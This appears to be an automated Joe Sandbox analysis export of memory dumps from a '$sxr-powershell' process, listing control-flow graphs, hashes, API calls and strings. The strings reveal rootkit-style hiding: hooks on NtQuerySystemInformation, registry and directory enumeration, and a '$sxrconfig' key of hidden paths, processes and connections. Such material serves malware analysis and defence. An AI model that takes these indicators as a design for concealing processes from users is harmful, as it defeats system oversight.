                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleType
                                                                                                            • String ID:
                                                                                                            • API String ID: 3000768030-0
                                                                                                            • Opcode ID: 886dffb09205d202da52528ad762ca177720b59a1f976d6d5f71bc5666910ac8
                                                                                                            • Instruction ID: e2a4adbf72c12da3b308920f20f41ba257a8e335aa4ec24e17f0939fbfd77b6f
                                                                                                            • Opcode Fuzzy Hash: 886dffb09205d202da52528ad762ca177720b59a1f976d6d5f71bc5666910ac8
                                                                                                            • Instruction Fuzzy Hash: A131C832A18F46D1EBA48F1595A02B92B52F345BB0F781BA9DB7A073E0CB35D463D341
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3441317376.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_7ffd348a0000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: _[_H
                                                                                                            • API String ID: 0-2548533632
                                                                                                            • Opcode ID: 49dde3b9c252ab50716133ea58e670a6def3b01bcd91e0f1580a2a702fefbc20
                                                                                                            • Instruction ID: ad0159d3545f018f63c3e7a1b90527b8a0853f959b3d2c755717afeba1473a4f
                                                                                                            • Opcode Fuzzy Hash: 49dde3b9c252ab50716133ea58e670a6def3b01bcd91e0f1580a2a702fefbc20
                                                                                                            • Instruction Fuzzy Hash: 92C15E30A19A4D8FDF98DF5CC4A5AAD77E1FFA8704F144169D40DD7295CA78E881CB80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 99 1f5fdc429a0-1f5fdc42a0b call 1f5fdc40f34 * 4 108 1f5fdc42a11-1f5fdc42a14 99->108 109 1f5fdc42c23 99->109 108->109 111 1f5fdc42a1a-1f5fdc42a1d 108->111 110 1f5fdc42c25-1f5fdc42c41 109->110 111->109 112 1f5fdc42a23-1f5fdc42a26 111->112 112->109 113 1f5fdc42a2c-1f5fdc42a4a VirtualAlloc 112->113 113->109 114 1f5fdc42a50-1f5fdc42a74 call 1f5fdc40d6c 113->114 117 1f5fdc42a76-1f5fdc42aa1 call 1f5fdc40d6c 114->117 118 1f5fdc42aa3-1f5fdc42aaa 114->118 117->118 120 1f5fdc42b4a-1f5fdc42b51 118->120 121 1f5fdc42ab0-1f5fdc42abd 118->121 123 1f5fdc42b57-1f5fdc42b6e 120->123 124 1f5fdc42c04-1f5fdc42c21 120->124 121->120 125 1f5fdc42ac3-1f5fdc42ad1 121->125 123->124 126 1f5fdc42b74 123->126 124->110 132 1f5fdc42b35-1f5fdc42b3d 125->132 133 1f5fdc42ad3-1f5fdc42add 125->133 128 1f5fdc42b7a-1f5fdc42b8f 126->128 130 1f5fdc42b91-1f5fdc42ba2 128->130 131 1f5fdc42bf3-1f5fdc42bfe 128->131 136 1f5fdc42ba4-1f5fdc42bab 130->136 137 1f5fdc42bad-1f5fdc42bb1 130->137 131->124 131->128 132->125 134 1f5fdc42b3f-1f5fdc42b44 132->134 138 1f5fdc42ae0-1f5fdc42ae4 133->138 134->120 139 1f5fdc42be0-1f5fdc42bf1 136->139 140 1f5fdc42bbc-1f5fdc42bc0 137->140 141 1f5fdc42bb3-1f5fdc42bba 137->141 142 1f5fdc42ae6-1f5fdc42aea 138->142 143 1f5fdc42b32 138->143 139->130 139->131 144 1f5fdc42bd2-1f5fdc42bd6 140->144 145 1f5fdc42bc2-1f5fdc42bd0 140->145 141->139 146 1f5fdc42aec-1f5fdc42b13 142->146 147 1f5fdc42b15-1f5fdc42b1f 142->147 143->132 144->139 149 1f5fdc42bd8-1f5fdc42bdb 144->149 145->139 148 1f5fdc42b25-1f5fdc42b30 146->148 147->148 148->138 149->139
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3430519783.000001F5FDC40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F5FDC40000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc40000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction ID: 29571c6e35b65c0117ab10a0097ba91f26ed8a843f89d92ec64be9dc23485e4c
                                                                                                            • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction Fuzzy Hash: 50610C32701A528BEF68CF1994617B9F3A2FB46B94F548435DB2A07785DE39E853C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 150 7ffd3497052a-7ffd3497053d 152 7ffd3497053f-7ffd34970548 150->152 153 7ffd3497054a-7ffd34970574 150->153 152->153 158 7ffd3497057b-7ffd34970583 153->158 159 7ffd3497058b-7ffd34970590 158->159 160 7ffd34970585-7ffd34970589 158->160 161 7ffd34970591-7ffd3497059b 159->161 160->161
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3442529177.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_7ffd34970000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: H
                                                                                                            • API String ID: 0-2852464175
                                                                                                            • Opcode ID: a868ede8817eeb6ba8fff1e189fcba9496f81420b31ad0451030141959d36ead
                                                                                                            • Instruction ID: 7c1807df5fe0910fc1707011ad18ca8eeefd30d889dd673304cf67aaa620f9b3
                                                                                                            • Opcode Fuzzy Hash: a868ede8817eeb6ba8fff1e189fcba9496f81420b31ad0451030141959d36ead
                                                                                                            • Instruction Fuzzy Hash: AF01F132F0E5854EE7A5DA2858A51B87BC1EF47304F4984BED64CC71C7DD2EAC0483A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 163 1f5fdc7b900-1f5fdc7b90f 164 1f5fdc7b911-1f5fdc7b91d 163->164 165 1f5fdc7b91f-1f5fdc7b92f 163->165 164->165 166 1f5fdc7b962-1f5fdc7b96d call 1f5fdc7b8e0 164->166 167 1f5fdc7b946-1f5fdc7b95e HeapAlloc 165->167 171 1f5fdc7b96f-1f5fdc7b974 166->171 168 1f5fdc7b931-1f5fdc7b938 call 1f5fdc7e6f0 167->168 169 1f5fdc7b960 167->169 168->166 175 1f5fdc7b93a-1f5fdc7b944 call 1f5fdc79dc4 168->175 169->171 175->166 175->167
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 4292702814-0
                                                                                                            • Opcode ID: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
                                                                                                            • Instruction ID: 0acfe7b6cf2e418419896e7fac77b997b0b7ae8ba8cd35bdf28c1c540d7f70d0
                                                                                                            • Opcode Fuzzy Hash: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
                                                                                                            • Instruction Fuzzy Hash: D1F01D75701A1BC1FFD56B65D4713F552A76B49B84F0C5CB08B3A963D1ED2CC5438211
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 178 1f5fdc7b978-1f5fdc7b97b 179 1f5fdc7b9b4 178->179 180 1f5fdc7b97d-1f5fdc7b996 HeapFree 178->180 181 1f5fdc7b998 call 1f5fdc7b8e0 180->181 182 1f5fdc7b9af-1f5fdc7b9b3 180->182 181->182 182->179
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3298025750-0
                                                                                                            • Opcode ID: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
                                                                                                            • Instruction ID: 730aea16fe9de993e8ff3a363cd058195016ae1d6fd4a9fe88393c39e706d668
                                                                                                            • Opcode Fuzzy Hash: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
                                                                                                            • Instruction Fuzzy Hash: 37D01271B11C47C2FF98A7E3E8757F201676F95B85F4858B0DF3985251EA1444938640
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 251 7ffd348a2b85-7ffd348a2be0 253 7ffd348a2bf7-7ffd348a2c06 251->253 254 7ffd348a2be2-7ffd348a2bf5 251->254 257 7ffd348a2c0d-7ffd348a2c23 253->257 254->253
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3441317376.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_7ffd348a0000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0c8eb8843c4c5862470b4dc38798520c15323d5a746d06ee54a560d89635dbbf
                                                                                                            • Instruction ID: 0271b3ad7e50c666a008194bf5752dd12da9a24cdb4f26398d37c1f6bf5034b2
                                                                                                            • Opcode Fuzzy Hash: 0c8eb8843c4c5862470b4dc38798520c15323d5a746d06ee54a560d89635dbbf
                                                                                                            • Instruction Fuzzy Hash: 0311E91270EF894FDB96E67C94F43A53B90DFA621570800F7C549D72A2DD18DC078351
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 259 7ffd348a33a5-7ffd348a33af 260 7ffd348a33f1-7ffd348a3420 259->260 261 7ffd348a33b1-7ffd348a33c5 259->261 264 7ffd348a3437-7ffd348a3463 260->264 265 7ffd348a3422-7ffd348a342c 260->265 266 7ffd348a342e-7ffd348a3435 265->266 266->264
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3441317376.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_7ffd348a0000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0e738db19cee2333fc284c30e206e715022da6faa4a3adbc625ad7bd6cf7db4f
                                                                                                            • Instruction ID: 74da37532352cbeea9d9f1660a99dc6042547fc3e74f3e8359d6f5d00c912e40
                                                                                                            • Opcode Fuzzy Hash: 0e738db19cee2333fc284c30e206e715022da6faa4a3adbc625ad7bd6cf7db4f
                                                                                                            • Instruction Fuzzy Hash: 5711D021B1EEC90FD796D77864B92A43BE0EF96200B4900FBC84CDB2A3CC58AC068351
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 270 7ffd348a33ec-7ffd348a3420 272 7ffd348a3437-7ffd348a3463 270->272 273 7ffd348a3422-7ffd348a3435 270->273 273->272
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3441317376.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_7ffd348a0000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 65c128a2818c31a32dfddcbb3905b45c9b78113e969fb4e74556aee9218b2229
                                                                                                            • Instruction ID: de200f4eca8bf06790ff32871c6a856c468230a492039a5c4beec4890ff7ea32
                                                                                                            • Opcode Fuzzy Hash: 65c128a2818c31a32dfddcbb3905b45c9b78113e969fb4e74556aee9218b2229
                                                                                                            • Instruction Fuzzy Hash: 57012621B2EE8E0FDBD5E3AC50B827467D0EFA8315B4801BBC80DD3296CC68EC424380
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 278 7ffd34970293-7ffd349702c0 282 7ffd349702c8-7ffd349702d1 278->282 283 7ffd349702d3-7ffd349702e0 282->283 284 7ffd349702ea-7ffd349702f7 282->284 283->284 286 7ffd349702e2-7ffd349702e8 283->286 286->284
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3442529177.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_7ffd34970000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 95d54f3add0f148de44f5628c7a69a191ea3baad5ff1da202b0074e51cf308e2
                                                                                                            • Instruction ID: 6617f09c602954040cafc3d0a384a80c9aec90f92da39788731912d8317f04a4
                                                                                                            • Opcode Fuzzy Hash: 95d54f3add0f148de44f5628c7a69a191ea3baad5ff1da202b0074e51cf308e2
                                                                                                            • Instruction Fuzzy Hash: 19F0D133F0E99A0FE7A592181CB91F86B81EF5A720B5900BED64DD7183DC09AC058395
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 288 7ffd348a3d68-7ffd348a3d6d 290 7ffd348a3d41-7ffd348a3d67 288->290
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3441317376.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_7ffd348a0000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 23dab133d60369e39cc8f2f524a89731ce62384872f4ecf44cab9d93a85f5f1c
                                                                                                            • Instruction ID: 7ae214c7a5991379c5b9bade55974d791a1f4a12bfcd825d08fa7c30f78a185f
                                                                                                            • Opcode Fuzzy Hash: 23dab133d60369e39cc8f2f524a89731ce62384872f4ecf44cab9d93a85f5f1c
                                                                                                            • Instruction Fuzzy Hash: 45F0373275C6048FDB5CAA5CF4529B573D1E795320B10016EE48BC3696E927F8428685
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                            • Opcode ID: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                            • Instruction ID: e3f21418bd5b77541e5d6d0a384a6c17b139c78df4a55d6b9b9a897ff846f1a3
                                                                                                            • Opcode Fuzzy Hash: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                            • Instruction Fuzzy Hash: BCB19132210E92C2EB989F26D4607F9A3A6FB45B84F1458B6EF6953794DF35CD82C340
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3140674995-0
                                                                                                            • Opcode ID: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                            • Instruction ID: 8304a4c6edba32c3401fe522ad5f546774d80d5d64c59d086dbdca545ec73518
                                                                                                            • Opcode Fuzzy Hash: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                            • Instruction Fuzzy Hash: 86316B72201F81CAEB609F61E8607EE7362F784744F44442ADB5E87B99EF38C64AC710
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1239891234-0
                                                                                                            • Opcode ID: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                            • Instruction ID: 1fa746262079cc6d0ec37ccfccfb9d7a6af191b68b1a800f0a9a8e7d54888f57
                                                                                                            • Opcode Fuzzy Hash: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                            • Instruction Fuzzy Hash: 22319E32214F8196EB60DF25E8507EE73A6F788794F540526EBAD43BA9DF38C146CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                            • String ID:
                                                                                                            • API String ID: 1443284424-0
                                                                                                            • Opcode ID: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                            • Instruction ID: 75276441b27674de1942e2cb8de842e70413a46d521c01197d1fa73f3824c401
                                                                                                            • Opcode Fuzzy Hash: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                            • Instruction Fuzzy Hash: 90E12072B04E818AE710CF64D0A06EE7BB2F344798F154166EF6A57BD9DA38C41BE700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3430519783.000001F5FDC40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F5FDC40000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc40000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                            • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                                                                            • API String ID: 3215553584-1407779936
                                                                                                            • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                            • Instruction ID: 697b751569ece7ce55378409b6cefcda17a8125b5cfb8212c3dbe7c076d5a716
                                                                                                            • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                            • Instruction Fuzzy Hash: 0B51DF72B10F9685EF25DFA698206FD27A3FB5ABD8F544535DF2907B85EA38C0428300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                            • String ID: SOFTWARE\$sxrconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                            • API String ID: 106492572-3028563969
                                                                                                            • Opcode ID: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                            • Instruction ID: 65a6f1e83847eef1752310cdbdc9ed6844bc014c61e642bb0cea641e464dfee2
                                                                                                            • Opcode Fuzzy Hash: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                            • Instruction Fuzzy Hash: E9710A36310E52C5EB50AF66E860AEA27A6F784F88F042561DF6D97B28DF38C446C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread$AddressHandleLibraryLoadModuleProc
                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$Sysprep_Clean_Validate_Opk$advapi32.dll$ntdll.dll$sechost.dll$spopk.dll
                                                                                                            • API String ID: 1741086925-759476645
                                                                                                            • Opcode ID: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                            • Instruction ID: 4ff74bd60b9250bcf7d07826844fa36db308513573845b04650096b259c1e8fe
                                                                                                            • Opcode Fuzzy Hash: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                            • Instruction Fuzzy Hash: 9C41CE74612E4BE1FB80EB64E871AF66327B704344F8148B3972953572AE79868BC360
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                            • String ID: d
                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                            • Opcode ID: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                            • Instruction ID: 3f1e02b84af7309447acf28633592ac15a40043614a76fdfa8a67f72611c810a
                                                                                                            • Opcode Fuzzy Hash: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                            • Instruction Fuzzy Hash: C9516972204F85D3EB54DF62E4587AAB3A2F789F81F489134DBA947B18DF38C0568B00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                            • String ID: \\.\pipe\$sxrchildproc34226543a32$\\.\pipe\$sxrchildproc38764243a64
                                                                                                            • API String ID: 2171963597-1213686612
                                                                                                            • Opcode ID: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                            • Instruction ID: 55eecf24245fc035bbc424791ec3d5224a51302c291f928e9bdfd5dfacb10899
                                                                                                            • Opcode Fuzzy Hash: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                            • Instruction Fuzzy Hash: 77214136614B41C3FB509B25F4647AA73A2F389B94F541265DB6943BA8DF3CC14ACB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                            • String ID: d
                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                            • Opcode ID: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                            • Instruction ID: 3a9e7704764545e71621862a6ef60caa6c7505eba9176ba2b1cba4605337d2a0
                                                                                                            • Opcode Fuzzy Hash: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                            • Instruction Fuzzy Hash: 90417D33214B81D7E7608F62E4547EAB7A2F389B84F048529DB994BB58DF38D566CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
